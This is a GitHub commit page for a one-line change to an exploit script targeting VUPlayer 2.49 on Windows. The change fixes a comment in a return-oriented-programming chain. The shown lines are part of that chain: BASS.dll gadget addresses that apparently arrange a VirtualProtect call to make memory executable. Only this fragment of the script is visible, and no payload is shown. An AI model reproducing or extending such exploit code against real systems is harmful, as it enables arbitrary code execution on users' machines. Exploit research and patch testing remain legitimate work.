Skip to content

Commit d4d25d3

Browse files
authored
Fixes
1 parent 2652582 commit d4d25d3

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

VUPlayer_2.49_Windows_exploit/exploit.py

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -13,7 +13,7 @@ def p32(x):
1313
rop_chain += p32(0x100106e1) # POP EBP # RETN ** [BASS.dll] ** | {PAGE_EXECUTE_READWRITE}
1414
rop_chain += p32(0x100106e1) # Clean ptr VirtualProtect from stack
1515
rop_chain += p32(0x10015f77) # POP EAX # RETN ** [BASS.dll] ** | ascii {PAGE_EXECUTE_READWRITE}
16-
rop_chain += p32(0xfffffd97) # -0x00000297 = 0xfffffd97 => EAX
16+
rop_chain += p32(0xfffffd97) # -0x269 = 0xfffffd97 => EAX
1717
rop_chain += p32(0x10014db4) # NEG EAX # RETN ** [BASS.dll] ** | {PAGE_EXECUTE_READWRITE}
1818
rop_chain += p32(0x10032f72) # XCHG EAX,EBX # RETN 0x00 ** [BASS.dll] ** | ascii {PAGE_EXECUTE_READWRITE}
1919
rop_chain += p32(0x10015f77) # POP EAX # RETN ** [BASS.dll] ** | ascii {PAGE_EXECUTE_READWRITE}

0 commit comments

Comments
 (0)